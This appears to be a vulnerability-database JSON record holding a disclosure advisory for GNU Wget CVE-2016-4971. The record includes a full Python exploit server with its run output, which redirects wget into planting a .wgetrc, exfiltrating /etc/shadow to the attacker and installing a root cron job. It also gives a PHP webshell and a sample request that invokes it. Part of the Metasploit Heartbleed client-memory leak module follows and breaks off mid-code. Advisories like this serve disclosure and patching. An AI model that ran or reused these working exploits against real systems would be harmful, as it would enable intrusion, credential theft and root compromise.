\nFTP_HOST = '192.168.57.1' \nFTP_PORT = 21 \n \nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\" \n \nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) \n \nprint \"Ready? Is your FTP server running?\" \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nresult = sock.connect_ex((FTP_HOST, FTP_PORT)) \nif result == 0: \nprint \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT) \nelse: \nprint \"FTP is down :( Exiting.\" \nexit(1) \n \nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT \n \nhandler.serve_forever() \n \n \n---[ eof ]--- \n \n \n \nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes \nthe aforementioned cronjob with wget. \n \nThe output should look similar to: \n \n \n---[ wget-exploit.py output ]--- \n \nattackers-server# python ./wget-exploit.py \n \nReady? Is your FTP server running? \nFTP found open on 192.168.57.1:21. Let's go then \n \nServing wget exploit on port 80... \n \n \nWe have a volunteer requesting /database.db by GET :) \n \nUploading .wgetrc via ftp redirect vuln. It should land in /root \n \n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 - \nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n \nWe have a volunteer requesting /database.db by POST :) \n \nReceived POST from wget, this should be the extracted /etc/shadow file: \n \n---[begin]--- \nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7::: \ndaemon:*:16484:0:99999:7::: \nbin:*:16484:0:99999:7::: \nsys:*:16484:0:99999:7::: \nsync:*:16484:0:99999:7::: \ngames:*:16484:0:99999:7::: \nman:*:16484:0:99999:7::: \nlp:*:16484:0:99999:7::: \n...cut... \n---[eof]--- \n \nSending back a cronjob script as a thank-you for the file... \nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response) \n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 - \n \nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n \n---[ output eof ]--- \n \n \nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file \nsetting to /etc/shadow. \nTherefore, on the next wget run, wget sent back shadow file to the attacker. \nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver: \n \n \nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n \nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root) \n \n \n \n2) PHP web application scenario \n \nIf wget is used within a PHP script e.g.: \n \n<?php \n \n// Update geoip data \n \nsystem(\"wget -N -P geoip http://attackers-host/goeip.db\"); \n \n?> \n \nAn attacker who manages to respond to the request could simply upload a PHP \nbackdoor of: \n \n<?php \n//webshell.php \n \nsystem($_GET['cmd']); \n?> \n \nby using the wget-exploit script described in example 1. \n \nAfter the upload he could simply execute the script and their shell \ncommand by a GET request to: \n \nhttp://victims-php-host/geoip/webshell.php?cmd=id \n \n \nVI. BUSINESS IMPACT \n------------------------- \n \nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or \neven path (if wget is run from a home directory). \nDepending on the context in which wget is used, this could lead to \nuploading a web shell and granting the attacker access remote access to the \nsystem, or privilege escalation. It could be possible for attackers to escalate \nto root user if wget is run via root cronjob as it is often the case in web \napplication deployments and is recommended in some guides on the Internet. \n \nThe vulnerability could also be exploited by well-positioned attackers within \nthe networ who are able to intercept/modify the network traffic. \n \n \nVII. SYSTEMS AFFECTED \n------------------------- \n \nAll versions of Wget before the patched version of 1.18 are affected. \n \nVIII. SOLUTION \n------------------------- \n \nUpdate to wget version 1.18 as advertised by the vendor at: \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nLinux distributions should update their wget packages. It is recommended \nto update wget manually if an updated package is not available for your \ndistribution. \n \nIX. REFERENCES \n------------------------- \n \nhttp://legalhackers.com \n \nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt \n \nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html \n \nhttp://www.ubuntu.com/usn/usn-3012-1/ \n \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1 \n \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971 \n \nX. CREDITS \n------------------------- \n \nThe vulnerability has been discovered by Dawid Golunski \ndawid (at) legalhackers (dot) com \nlegalhackers.com \n \nXI. REVISION HISTORY \n------------------------- \n \n06.07.2016 - Advisory released \n \nXII. LEGAL NOTICES \n------------------------- \n \nThe information contained within this advisory is supplied \"as-is\" with \nno warranties or guarantees of fitness of use or otherwise. I accept no \nresponsibility for any damage caused by the use or misuse of this information. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/137795/wget-fileuploadexec.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-07-08T18:47:09", "bulletinFamily": "exploit", "description": "GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution. CVE-2016-4971. Remote exploit for linux platform", "modified": "2016-07-06T00:00:00", "published": "2016-07-06T00:00:00", "id": "EDB-ID:40064", "href": "https://www.exploit-db.com/exploits/40064/", "type": "exploitdb", "title": "GNU Wget < 1.18 - Arbitrary File Upload/Remote Code Execution", "sourceData": "=============================================\r\n- Release date: 06.07.2016\r\n- Discovered by: Dawid Golunski\r\n- Severity: High\r\n- CVE-2016-4971\r\n=============================================\r\n\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\n\r\nGNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution\r\n\r\n\r\nII. BACKGROUND\r\n-------------------------\r\n\r\n\"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and \r\nFTP, the most widely-used Internet protocols. \r\nIt is a non-interactive commandline tool, so it may easily be called from \r\nscripts, cron jobs, terminals without X-Windows support, etc.\r\n\r\nGNU Wget has many features to make retrieving large files or mirroring entire \r\nweb or FTP sites easy\r\n\"\r\n\r\nhttps://www.gnu.org/software/wget/\r\n\r\n\r\nIII. INTRODUCTION\r\n-------------------------\r\n\r\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \r\ncompromised web server) can be tricked into saving an arbitrary remote file \r\nsupplied by an attacker, with arbitrary contents and filename under \r\nthe current directory and possibly other directories by writing to .wgetrc.\r\nDepending on the context in which wget is used, this can lead to remote code \r\nexecution and even root privilege escalation if wget is run via a root cronjob \r\nas is often the case in many web application deployments. \r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe network who are able to intercept/modify the network traffic.\r\n\r\n\r\nIV. DESCRIPTION\r\n-------------------------\r\n\r\nBecause of lack of sufficient controls in wget, when user downloads a file \r\nwith wget, such as:\r\n\r\nwget http://attackers-server/safe_file.txt\r\n\r\nan attacker who controls the server could make wget create an arbitrary file\r\nwith an arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \r\ncontaining FTP server reference in response to the victim's wget request. \r\n\r\nFor example, if the attacker's server replies with the following response:\r\n\r\nHTTP/1.1 302 Found\r\nCache-Control: private\r\nContent-Type: text/html; charset=UTF-8\r\nLocation: ftp://attackers-server/.bash_profile\r\nContent-Length: 262\r\nServer: Apache\r\n\r\nwget will automatically follow the redirect and will download a malicious\r\n.bash_profile file from a malicious FTP server. \r\nIt will fail to rename the file to the originally requested filename of \r\n'safe_file.txt' as it would normally do, in case of a redirect to another \r\nHTTP resource with a different name. \r\n\r\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\r\nwith an arbitrary filename to the victim's current directory.\r\n\r\nExecution flow:\r\n\r\nvictim@trusty:~$ wget --version | head -n1\r\nGNU Wget 1.17 built on linux-gnu.\r\n\r\nvictim@trusty:~$ pwd\r\n/home/victim\r\n\r\nvictim@trusty:~$ ls\r\nvictim@trusty:~$ \r\n\r\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\r\nResolving attackers-server... 192.168.57.1\r\nConnecting to attackers-server|192.168.57.1|:80... connected.\r\nHTTP request sent, awaiting response... 302 Found\r\nLocation: ftp://192.168.57.1/.bash_profile [following]\r\n => \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122\r\nConnecting to 192.168.57.1:21... connected.\r\nLogging in as anonymous ... Logged in!\r\n==> SYST ... done. ==> PWD ... done.\r\n==> TYPE I ... done. ==> CWD not needed.\r\n==> SIZE .bash_profile ... 55\r\n==> PASV ... done. ==> RETR .bash_profile ... done.\r\nLength: 55 (unauthoritative)\r\n\r\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\r\n\r\n2016-02-19 04:50:37 (1.27 MB/s) - \u00e2\u20ac\u02dc.bash_profile\u00e2\u20ac\u2122 saved [55]\r\n\r\n\r\nvictim@trusty:~$ ls -l\r\ntotal 4\r\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\r\nvictim@trusty:~$ \r\n\r\n\r\nThis vulnerability will not work if extra options that force destination\r\nfilename are specified as a paramter. Such as: -O /tmp/output\r\nIt is however possible to exploit the issue with mirroring/recursive options\r\nenabled such as -r or -m.\r\n\r\nAnother limitation is that attacker exploiting this vulnerability can only\r\nupload his malicious file to the current directory from which wget was run, \r\nor to a directory specified by -P option (directory_prefix option).\r\nThis could however be enough to exploit wget run from home directory, or\r\nwithin web document root (in which case attacker could write malicious php files\r\nor .bash_profile files).\r\n\r\nThe current directory limitation could also be bypassed by uploading a .wgetrc \r\nconfig file if wget was run from a home directory.\r\n\r\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\r\nsettings such as destination directory for all downloaded files in future,\r\nas well as set a proxy setting to make future requests go through a malicious \r\nproxy server belonging to the attackers to which they could send further \r\nmalicious responses.\r\n\r\n\r\nHere is a set of Wget settings that can be helpful to an attacker:\r\n\r\ndir_prefix = string\r\n\tTop of directory tree\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-P string\u00e2\u20ac\u2122.\r\n\r\npost_file = file\r\n\tUse POST as the method for all HTTP requests and send the contents of file in the request body. The same as \u00e2\u20ac\u02dc--post-file=file\u00e2\u20ac\u2122.\r\n\r\nrecursive = on/off\r\n\tRecursive on/off\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-r\u00e2\u20ac\u2122.\r\n\r\ntimestamping = on/off\r\n\tAllows to overwrite existing files.\r\n\r\ncut_dirs = n\r\n\tIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\r\n\r\nhttp_proxy \r\n\tHTTP Proxy server\r\n\r\nhttps_proxy \r\n\tHTTPS Proxy server\r\n\r\noutput_document = file\r\n\tSet the output filename\u00e2\u20ac\u201dthe same as \u00e2\u20ac\u02dc-O file\u00e2\u20ac\u2122.\r\n\r\ninput = file\r\n\tRead the URLs from string, like \u00e2\u20ac\u02dc-i file\u00e2\u20ac\u2122.\r\n\r\nmetalink-over-http\r\n\tIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \r\n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\r\n\r\n\r\n\r\nFull list of .wgetrc options can be found in:\r\n\r\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\r\n\r\n\r\n\r\nV. PROOF OF CONCEPT EXPLOIT\r\n-------------------------\r\n\r\n\r\n1) Cronjob with wget scenario\r\n\r\nOften wget is used inside cronjobs. By default cronjobs run within home \r\ndirectory of the cronjob owner.\r\nSuch wget cronjobs are commonly used with many applications used to download \r\nnew version of databases, requesting web scripts that perform scheduled tasks \r\nsuch as rebuilding indexes, cleaning caches etc. \r\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \r\nthe Internet with exploitable wget cronjobs:\r\n\r\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\r\nhttps://docs.moodle.org/2x/ca/Cron\r\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\r\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\r\n\r\nSuch setup could be abused by attackers to upload .bash_profile file through\r\nwget vulnerability and run commands in the context of the victim user upon \r\ntheir next log-in. \r\n\r\nAs cron runs priodically attackers, could also write out .wgetrc file in the \r\nfirst response and then write to /etc/cron.d/malicious-cron in the second. \r\nIf a cronjob is run by root, this would give them an almost instant root code \r\nexecution.\r\n\r\n\r\nIt is worth noting that if an attacker had access to local network they could \r\npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \r\nresponses to wget requests.\r\n\r\nThis issue could also be exploited by attackers who have already gained \r\naccess to the server through a web vulnerability to escalate their privileges. \r\nIn many cases the cron jobs (as in examples above) are set up to request \r\nvarious web scripts e.g: \r\nhttp://localhost/clean-cache.php \r\n\r\nIf the file was writable by apache, and attacker had access to www-data/apache \r\naccount, they could modify it to return malicious Location header and exploit \r\nroot cronjob that runs the wget request in order to escalate their privileges \r\nto root.\r\n\r\n\r\nFor simplicity we can assume that attacker already has control over the server \r\nthat the victim sends the request to with wget.\r\n\r\nThe root cronjob on the victim server may look as follows:\r\n\r\nroot@victim:~# cat /etc/cron.d/update-database\r\n# Update database file every 2 minutes\r\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\r\n\r\n\r\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \r\nand starts an FTP server:\r\n\r\nattackers-server# mkdir /tmp/ftptest\r\nattackers-server# cd /tmp/ftptest\r\n\r\nattackers-server# cat <<_EOF_>.wgetrc\r\npost_file = /etc/shadow\r\noutput_document = /etc/cron.d/wget-root-shell\r\n_EOF_\r\n\r\nattackers-server# sudo pip install pyftpdlib\r\nattackers-server# python -m pyftpdlib -p21 -w\r\n\r\n\r\nAt this point attacker can start an HTTP server which will exploit wget by\r\nsending malicious redirects to the victim wget's requests:\r\n \r\n---[ wget-exploit.py ]---\r\n\r\n#!/usr/bin/env python\r\n\r\n#\r\n# Wget 1.18 < Arbitrary File Upload Exploit\r\n# Dawid Golunski\r\n# dawid( at )legalhackers.com\r\n#\r\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n#\r\n# CVE-2016-4971 \r\n#\r\n\r\nimport SimpleHTTPServer\r\nimport SocketServer\r\nimport socket;\r\n\r\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n def do_GET(self):\r\n # This takes care of sending .wgetrc\r\n\r\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n\t print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\r\n self.send_response(301)\r\n new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\r\n print \"Sending redirect to %s \\n\"%(new_path)\r\n self.send_header('Location', new_path)\r\n self.end_headers()\r\n\r\n def do_POST(self):\r\n # In here we will receive extracted file and install a PoC cronjob\r\n\r\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\r\n if \"Wget\" not in self.headers.getheader('User-Agent'):\r\n\t print \"But it's not a Wget :( \\n\"\r\n self.send_response(200)\r\n self.end_headers()\r\n self.wfile.write(\"Nothing to see here...\")\r\n return\r\n\r\n content_len = int(self.headers.getheader('content-length', 0))\r\n post_body = self.rfile.read(content_len)\r\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\r\n\r\n print \"Sending back a cronjob script as a thank-you for the file...\" \r\n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text/plain')\r\n self.end_headers()\r\n self.wfile.write(ROOT_CRON)\r\n\r\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\r\n\r\n return\r\n\r\nHTTP_LISTEN_IP = '192.168.57.1'\r\nHTTP_LISTEN_PORT = 80\r\nFTP_HOST = '192.168.57.1'\r\nFTP_PORT = 21\r\n\r\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\r\n\r\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\r\n\r\nprint \"Ready? Is your FTP server running?\"\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\r\nif result == 0:\r\n print \"FTP found open on %s:%s. Let's go then\\n\" % (FTP_HOST, FTP_PORT)\r\nelse:\r\n print \"FTP is down :( Exiting.\"\r\n exit(1)\r\n\r\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\r\n\r\nhandler.serve_forever()\r\n\r\n\r\n---[ eof ]---\r\n\r\n\r\n\r\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\r\nthe aforementioned cronjob with wget.\r\n\r\nThe output should look similar to:\r\n\r\n\r\n---[ wget-exploit.py output ]---\r\n\r\nattackers-server# python ./wget-exploit.py \r\n\r\nReady? Is your FTP server running?\r\nFTP found open on 192.168.57.1:21. Let's go then\r\n\r\nServing wget exploit on port 80...\r\n\r\n\r\nWe have a volunteer requesting /database.db by GET :)\r\n\r\nUploading .wgetrc via ftp redirect vuln. It should land in /root \r\n\r\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\r\nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \r\n\r\nWe have a volunteer requesting /database.db by POST :)\r\n\r\nReceived POST from wget, this should be the extracted /etc/shadow file: \r\n\r\n---[begin]---\r\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\r\ndaemon:*:16484:0:99999:7:::\r\nbin:*:16484:0:99999:7:::\r\nsys:*:16484:0:99999:7:::\r\nsync:*:16484:0:99999:7:::\r\ngames:*:16484:0:99999:7:::\r\nman:*:16484:0:99999:7:::\r\nlp:*:16484:0:99999:7:::\r\n...cut...\r\n---[eof]---\r\n\r\nSending back a cronjob script as a thank-you for the file...\r\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\r\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\r\n\r\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \r\n\r\n---[ output eof ]---\r\n\r\n\r\nAs we can see .wgetrc got uploaded by the exploit. It has set the post_file\r\nsetting to /etc/shadow.\r\nTherefore, on the next wget run, wget sent back shadow file to the attacker.\r\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \r\ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \r\nserver:\r\n\r\n\r\nroot@victim:~# cat /etc/cron.d/wget-root-shell \r\n* * * * * root /usr/bin/id > /root/hacked-via-wget \r\n\r\nroot@victim:~# cat /root/hacked-via-wget \r\nuid=0(root) gid=0(root) groups=0(root)\r\n\r\n\r\n\r\n2) PHP web application scenario\r\n\r\nIf wget is used within a PHP script e.g.:\r\n\r\n<?php\r\n\r\n// Update geoip data\r\n\r\n system(\"wget -N -P geoip http://attackers-host/goeip.db\");\t\r\n\r\n?>\r\n\r\nAn attacker who manages to respond to the request could simply upload a PHP\r\nbackdoor of:\r\n\r\n<?php\r\n\t//webshell.php\r\n\r\n\tsystem($_GET['cmd']);\r\n?>\r\n\r\nby using the wget-exploit script described in example 1.\r\n\r\nAfter the upload he could simply execute the script and their shell\r\ncommand by a GET request to:\r\n\r\nhttp://victims-php-host/geoip/webshell.php?cmd=id\r\n\r\n\r\nVI. BUSINESS IMPACT\r\n-------------------------\r\n\r\nAffected versions of wget that connect to untrusted (or compromised) web \r\nservers could be tricked into uploading a file under an arbitrary name, or\r\neven path (if wget is run from a home directory).\r\nDepending on the context in which wget is used, this could lead to\r\nuploading a web shell and granting the attacker access remote access to the\r\nsystem, or privilege escalation. It could be possible for attackers to escalate\r\nto root user if wget is run via root cronjob as it is often the case in web \r\napplication deployments and is recommended in some guides on the Internet.\r\n\r\nThe vulnerability could also be exploited by well-positioned attackers within\r\nthe networ who are able to intercept/modify the network traffic.\r\n\r\n \r\nVII. SYSTEMS AFFECTED\r\n-------------------------\r\n\r\nAll versions of Wget before the patched version of 1.18 are affected.\r\n \r\nVIII. SOLUTION\r\n-------------------------\r\n\r\nUpdate to wget version 1.18 as advertised by the vendor at:\r\n\r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n\r\nLinux distributions should update their wget packages. It is recommended\r\nto update wget manually if an updated package is not available for your\r\ndistribution.\r\n \r\nIX. REFERENCES\r\n-------------------------\r\n\r\nhttp://legalhackers.com\r\n\r\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\r\n\r\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\r\n\r\nhttp://www.ubuntu.com/usn/usn-3012-1/\r\n\r\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\r\n\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\r\n\r\nX. CREDITS\r\n-------------------------\r\n\r\nThe vulnerability has been discovered by Dawid Golunski\r\ndawid (at) legalhackers (dot) com\r\nlegalhackers.com\r\n \r\nXI. REVISION HISTORY\r\n-------------------------\r\n\r\n06.07.2016 - Advisory released\r\n \r\nXII. LEGAL NOTICES\r\n-------------------------\r\n\r\nThe information contained within this advisory is supplied \"as-is\" with\r\nno warranties or guarantees of fitness of use or otherwise. I accept no\r\nresponsibility for any damage caused by the use or misuse of this information.\r\n\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40064/"}], "metasploit": [{"lastseen": "2019-11-25T12:50:38", "bulletinFamily": "exploit", "description": "This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is hardcoded for using the AES-128-CBC-SHA1 cipher.\n", "modified": "2018-08-27T18:11:22", "published": "2014-04-09T14:38:11", "id": "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY", "href": "", "type": "metasploit", "title": "OpenSSL Heartbeat (Heartbleed) Client Memory Exposure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TcpServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'OpenSSL Heartbeat (Heartbleed) Client Memory Exposure',\n 'Description' => %q{\n This module provides a fake SSL service that is intended to\n leak memory from client systems as they connect. This module is\n hardcoded for using the AES-128-CBC-SHA1 cipher.\n },\n 'Author' =>\n [\n 'Neel Mehta', # Vulnerability discovery\n 'Riku', # Vulnerability discovery\n 'Antti', # Vulnerability discovery\n 'Matti', # Vulnerability discovery\n 'hdm' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [['Capture']],\n 'PassiveActions' => ['Capture'],\n 'DefaultAction' => 'Capture',\n 'References' =>\n [\n [ 'CVE', '2014-0160' ],\n [ 'US-CERT-VU', '720951' ],\n [ 'URL', 'https://www.us-cert.gov/ncas/alerts/TA14-098A' ],\n [ 'URL', 'http://heartbleed.com/' ]\n ],\n 'DisclosureDate' => 'Apr 07 2014',\n 'Notes' =>\n {\n 'AKA' => ['Heartbleed']\n }\n\n )\n\n register_options(\n [\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 8443 ]),\n OptInt.new('HEARTBEAT_LIMIT', [true, \"The number of kilobytes of data to capture at most from each client\", 512]),\n OptInt.new('HEARTBEAT_READ', [true, \"The number of bytes to leak in the heartbeat response\", 65535]),\n OptBool.new('NEGOTIATE_TLS', [true, \"Set this to true to negotiate TLS and often leak more data at the cost of CA validation\", false])\n ])\n end\n\n # Initialize the client state and RSA key for this session\n def setup\n super\n @state = {}\n @cert_key = OpenSSL::PKey::RSA.new(1024){ } if negotiate_tls?\n end\n\n # Setup the server module and start handling requests\n def run\n print_status(\"Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...\")\n exploit\n end\n\n # Determine how much memory to leak with each request\n def heartbeat_read_size\n datastore['HEARTBEAT_READ'].to_i\n end\n\n # Determine how much heartbeat data to capture at the most\n def heartbeat_limit\n datastore['HEARTBEAT_LIMIT'].to_i * 1024\n end\n\n # Determine whether we should negotiate TLS or not\n def negotiate_tls?\n !! datastore['NEGOTIATE_TLS']\n end\n\n # Initialize a new state for every client\n def on_client_connect(c)\n @state[c] = {\n :name => \"#{c.peerhost}:#{c.peerport}\",\n :ip => c.peerhost,\n :port => c.peerport,\n :heartbeats => \"\",\n :server_random => [Time.now.to_i].pack(\"N\") + Rex::Text.rand_text(28)\n }\n print_status(\"#{@state[c][:name]} Connected\")\n end\n\n # Buffer messages and parse them once they are fully received\n def on_client_data(c)\n data = c.get_once\n return if not data\n @state[c][:buff] ||= \"\"\n @state[c][:buff] << data\n process_request(c)\n end\n\n # Extract TLS messages from the buffer and process them\n def process_request(c)\n\n # Make this slightly harder to DoS\n if @state[c][:buff].to_s.length > (1024*128)\n print_status(\"#{@state[c][:name]} Buffer limit reached, dropping connection\")\n c.close\n return\n end\n\n # Process any buffered messages\n loop do\n break unless @state[c][:buff]\n\n message_type, message_ver, message_len = @state[c][:buff].unpack(\"Cnn\")\n break unless message_len\n break unless @state[c][:buff].length >= message_len+5\n\n mesg = @state[c][:buff].slice!(0, message_len+5)\n\n if @state[c][:encrypted]\n process_openssl_encrypted_request(c, mesg)\n else\n process_openssl_cleartext_request(c, mesg)\n end\n end\n end\n\n # Process cleartext TLS messages\n def process_openssl_cleartext_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n if message_type == 0x15 and data.length >= 7\n message_level, message_reason = data[5,2].unpack(\"CC\")\n print_status(\"#{@state[c][:name]} Alert Level #{message_level} Reason #{message_reason}\")\n if message_level == 2 and message_reason == 0x30\n print_status(\"#{@state[c][:name]} Client rejected our certificate due to unknown CA\")\n return\n end\n\n if level == 2\n print_status(\"#{@state[c][:name]} Client rejected our connection with a fatal error: #{message_reason}\")\n return\n end\n\n end\n\n unless message_type == 0x18\n message_code = data[5,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, message_version, message_code)}\")\n end\n\n # Process the Client Hello\n unless @state[c][:received_hello]\n\n unless (message_type == 0x16 and data.length > 43 and message_code == 0x01)\n print_status(\"#{@state[c][:name]} Expected a Client Hello, received #{sprintf(\"type %.2x code %.2x\", message_type, message_code)}\")\n return\n end\n\n print_status(\"#{@state[c][:name]} Processing Client Hello...\")\n\n # Extract the client_random needed to compute the master key\n @state[c][:client_random] = data[11,32]\n @state[c][:received_hello] = true\n\n print_status(\"#{@state[c][:name]} Sending Server Hello...\")\n openssl_send_server_hello(c, data, protocol_version)\n return\n end\n\n # If we are negotiating TLS, handle Client Key Exchange/Change Cipher Spec\n if negotiate_tls?\n # Process the Client Key Exchange\n if message_type == 0x16 and data.length > 11 and message_code == 0x10\n print_status(\"#{@state[c][:name]} Processing Client Key Exchange...\")\n premaster_length = data[9, 2].unpack(\"n\").first\n\n # Extract the pre-master secret in encrypted form\n if data.length >= 11 + premaster_length\n premaster_encrypted = data[11, premaster_length]\n\n # Decrypt the pre-master secret using our RSA key\n premaster_clear = @cert_key.private_decrypt(premaster_encrypted) rescue nil\n @state[c][:premaster] = premaster_clear if premaster_clear\n end\n end\n\n # Process the Change Cipher Spec and switch to encrypted communications\n if message_type == 0x14 and message_code == 0x01\n print_status(\"#{@state[c][:name]} Processing Change Cipher Spec...\")\n initialize_encryption_keys(c)\n return\n end\n # Otherwise just start capturing heartbeats in clear-text mode\n else\n # Send heartbeat requests\n if @state[c][:heartbeats].length < heartbeat_limit\n openssl_send_heartbeat(c, protocol_version)\n end\n\n # Process cleartext heartbeat replies\n if message_type == 0x18\n vprint_status(\"#{@state[c][:name]} Heartbeat received (#{data.length-5} bytes) [#{@state[c][:heartbeats].length} bytes total]\")\n @state[c][:heartbeats] << data[5, data.length-5]\n end\n\n # Full up on heartbeats, disconnect the client\n if @state[c][:heartbeats].length >= heartbeat_limit\n print_status(\"#{@state[c][:name]} Heartbeats received [#{@state[c][:heartbeats].length} bytes total]\")\n store_captured_heartbeats(c)\n c.close()\n end\n end\n end\n\n # Process encrypted TLS messages\n def process_openssl_encrypted_request(c, data)\n message_type, message_version, protocol_version = data.unpack(\"Cn@9n\")\n\n return if @state[c][:shutdown]\n return unless data.length > 5\n\n buff = decrypt_data(c, data[5, data.length-5])\n unless buff\n print_error(\"#{@state[c][:name]} Failed to decrypt, giving up on this client\")\n c.close\n return\n end\n\n message_code = buff[0,1].to_s.unpack(\"C\").first\n vprint_status(\"#{@state[c][:name]} Message #{sprintf(\"type %.2x v%.4x %.2x\", message_type, 